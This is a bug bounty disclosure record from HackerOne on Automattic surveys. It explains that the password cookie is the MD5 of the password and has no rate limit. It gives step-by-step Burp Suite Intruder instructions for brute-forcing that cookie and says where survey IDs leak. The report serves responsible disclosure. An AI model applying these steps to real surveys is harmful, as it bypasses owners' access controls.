{"id": "H1:905816", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "Automattic: No Rate Limit when accessing \"Password protection\" enabled surveys leads to bypassing passwords via \"pd-pass_surveyid\" cookie", "description": "## Summary:\nHi team,\nIf you write the right password on any password protected survey, you will see this request :\n{F878934}\n\nThis request is protected with rate limit, that's great. But if you look to response, you will see a cookie. The password protection feature is cookie-based system.\nIn my survey, if you write the right password, system will set this cookie : `pd-pass_DA0C46C4EAECF2BA=81dc9bdb52d04dc20036dbd8313ed055`\nAnd basically this is `pd-pass_SURVEYID=md5(password)`, it encrypts the right password with MD5 and if you visit the survey page with this cookie, you can see the survey.\nSo, I tried to brute force this cookie with Burp Suite's `Payload Processing` feature. (it encrypts your value with any hash type). And it worked, there is no rate limit when directly accessing to the survey page with password cookie.\n\nActually, I didn't any way to find the survey IDs. But when you go to a survey without password protection, the survey ID will be inside the source code. And if you enable the password protection after that, the survey ID won't be changed.\nSo, attacker can save the survey ID before the survey creator enable the password protection feature.\n\nAlso, the `WordPress.com Shortcode` on `Sharing` page leaks the survey ID too. (but I don't know how it works, maybe this code turns to iframe etc. whne you paste it to any wordpress.com website)\n{F878946}\n\n## Steps To Reproduce:\n\n 1. Go to your survey's `Sharing` page and copy the survey ID from `WordPress.com Shortcode` \n 1. Turn on intercept on Burp Suite and go to your password protected survey.\n 1. And send the GET request to Intruder\n 1. Add `pd-pass_YOURSURVEYIDHERE=test` to cookie and set payload position to `test` value.\n 1. Now go to `Payloads` tab on Intruder and set the `Payload Processing` feature like that :\n {F878947}\n 1. Set the payload type to `Brute forcer` and you can change the other options like threads etc.\n 1. Start the attack.\n\nYou can watch the video :\n{F878959}\n\nProbably, this issue works on quizzes too, I didn't test it.\n\n## Impact\n\nBypassing the password protected surveys with brute force", "published": "2020-06-23T04:36:24", "modified": "2020-11-18T14:23:45", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/905816", "reporter": "bugra", "references": [], "cvelist": [], "lastseen": "2020-11-18T14:30:55", "viewCount": 0, "enchantments": {"dependencies": {"references": [], "modified": "2020-11-18T14:30:55", "rev": 2}, "score": {"value": -0.2, "vector": "NONE", "modified": "2020-11-18T14:30:55", "rev": 2}, "vulnersScore": -0.2}, "bounty": 150.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/automattic", "handle": "automattic", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/111/7f89e1ea233f92916202521a069fdbfe9eced339_original.png/3afcb5c896247e7ee8ada31b1c1eb8657e22241f911093acfe4ec7e97a3a959a", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/111/7f89e1ea233f92916202521a069fdbfe9eced339_original.png/eb31823a4cc9f6b6bb4db930ffdf512533928a68a4255fb50a83180281a60da5"}}, "h1reporter": {"disabled": false, "username": "bugra", "url": "/bugra", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/343/105/470c1fd0c4915f1fa9e9376053d0c1ba8af260b7_original.jpg/3afcb5c896247e7ee8ada31b1c1eb8657e22241f911093acfe4ec7e97a3a959a"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}

{}